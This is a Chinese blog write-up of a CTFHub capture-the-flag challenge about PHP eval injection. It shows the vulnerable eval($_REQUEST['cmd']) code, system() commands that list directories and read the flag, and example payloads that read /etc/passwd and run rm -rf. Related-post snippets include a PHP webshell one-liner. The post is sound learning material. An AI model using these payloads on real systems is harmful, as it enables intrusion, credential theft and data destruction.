CTFHub | eval执行

最新推荐文章于 2024-04-27 21:34:41 发布
最新推荐文章于 2024-04-27 21:34:41 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: CTF精进之路 文章标签: CTF web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/130150626
版权

 0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

eval执行:

        (无)        

网页显示内容

        

        

0x02 解题过程

0x1 方法一: 使用蚁剑连接 

检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else 。

<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

        

使用蚁剑连接 cmd 参数试试,测试连接发现可以成功连接,说明此题存在 eval 执行

        

检查目录列表发现关于 flag 的文件

        

检查文件内容发现此题 flag

        

0x2 方法二: 网页检查文件 

根据网页代码的提示,可以先把查看网页根目录文件的命令赋值给 cmd 然后执行

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls");

        

继续检查上一级文件夹,这里发现一个flag_9195的文件

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("ls /");

        

继续传参给cmd命令检查flag_9195的文件,发现此题flag

http://challenge-b7776ccd779fe163.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_9195");

        

        

0x03 eval执行

        eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。

        

例如:

1.访问服务器敏感信息

?cmd=system('cat /etc/passwd')

2.删除网页文件

?cmd=system("rm -rf /xx/xx");

         

        

0x04 参考文献

[1].Ho1aAs. CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”[EB/OL]. [2023-04-19]. https://blog.csdn.net/Xxy605/article/details/107548841.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHUB-技能树-Web题-RCE(远程代码执行)-eval执行
Static______的博客
05-09 411
CTFHUB-技能树-Web题-RCE(远程代码执行
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 804
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
ctfhub技能树web:RCE里的eval执行和命令注入
2302_81010533的博客
03-30 409
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
Demo不是emo的博客
12-31 5663
ctf命令执行题型解题方法汇总(持续更新中)
cctfhub---rce-eval文件执行
x2813488062的博客
02-24 3842
eval详解 命令详解 一.eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 代码中用cmd来接收传入数据 可以将代码传递给cmd来执行 /?cmd=system("pwd") system()函数的作用为执行系统命令并输出执行结果 执行 pwd 指令可立刻得知您目前所在的工作目录...
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2177
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
mongodb eval 执行服务器端脚本
09-10
MongoDB的`db.eval`函数是一个非常强大的工具,它允许用户在服务器端执行JavaScript代码,这对于执行复杂的逻辑或实现特定的数据库操作非常有用。在本文中,我们将深入探讨`db.eval`的使用方法、存储JavaScript以及...
符号执行angr解ctf逆向题组
12-28
5. **约束解决**:学习如何处理和解决执行过程中遇到的符号表达式,如通过`solver.satisfy_one()`或`solver.eval()`获取具体值。 6. **插件与自定义分析**:根据需求编写自定义插件,以增强`angr`的功能,如添加特定...
PyPI 官网下载 | eval_hj3415-0.2.1.tar.gz
01-27
这个库可能提供了与Zookeeper交互的API,允许用户执行诸如创建、读取、更新和删除Zookeeper节点的操作,同时也可能包含了帮助处理分布式环境中的锁、事件通知等功能。由于没有具体代码内容,我们无法详细解释它的...
CTFeval
最新发布
qq_74263993的博客
04-27 488
_REQUEST变量是一个关联数组,它的键是表单元素的名称,值是用户输入的数据。通过$_REQUEST变量,可以访问表单中所有输入字段的值,不论它们是使用GET、POST还是COOKIE方法提交的。在PHP中,$_REQUEST是一个超全局变量,用于收集HTML表单提交的数据。如果代码中存在解析错误,则 eval() 函数返回 false。hello=show_source('flag.php')该字符串必须是合法的 PHP 代码,且必须以分号结尾。
ctf 文件包含
weixin_45942044的博客
03-28 240
一、eval() 函数 一句话木马 <?php eval($_post[0]);?> eval()函数作用:将函数内的字符串当作代码来执行 使用蚁剑连接一句话木马,需要输入密码,密码值为post[]中的值。 二、通过php://filter获取flag ?php://filter/read=convert.base64-encode/resouce=flag.php 三、通过php://input获取shell ?php://input 在hackbar的post里写入&lt
php eval ctf,浅谈CTF中命令执行与绕过的小技巧
weixin_39758618的博客
03-16 1323
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载缘起lemon师傅在安全客里发表的一篇文章,总结的很详细,学到了很多姿势。但是在此我还想画蛇添足的做一些补充及解释。补充一下命令执行的漏洞。空格绕过< 符号%09 符号需要php环境,这里就不搭建啦,见谅)$IFS$9 符号${IFS} 符号这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在...
ctfhub-eval执行
m0_65766842的博客
02-28 224
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 4676
CTF之路:关于PHP eval() 注入问题
eval-Bugku CTF
m0_56859693的博客
09-05 1434
今天在bugku刷到了一道基础题,感觉考察的很全面。 源代码如下 第一行 include是将flag.php包含在页面代码中,也不难推测flag在flag.php中 第二行 $_REQUEST可以将用户传入的hello传给服务器 第三行分两个部分:eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行 把hello赋值为system("ls") 发现包含flag.php和index.php ...
CTFweb)中的常见php函数意义与用法
qq_52907838的博客
04-05 1395
is_numeric()函数用于检测变量是否为数字或数字字符串, 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回空值,即 FALSE var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 看到eval(),想到可以用命令执行漏洞 strpos() 函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到匹配,则返回 FALSE。 strlen函...
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 833
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
ctfhub DOM型xss
07-28
CTFHub 是一个知名的 CTF 平台,DOM 型 XSS 是其中的一种常见的漏洞类型。DOM(Document Object Model)型 XSS 漏洞是指攻击者通过修改网页的 DOM 结构,注入恶意的脚本代码,并在用户浏览器中执行,从而实现攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值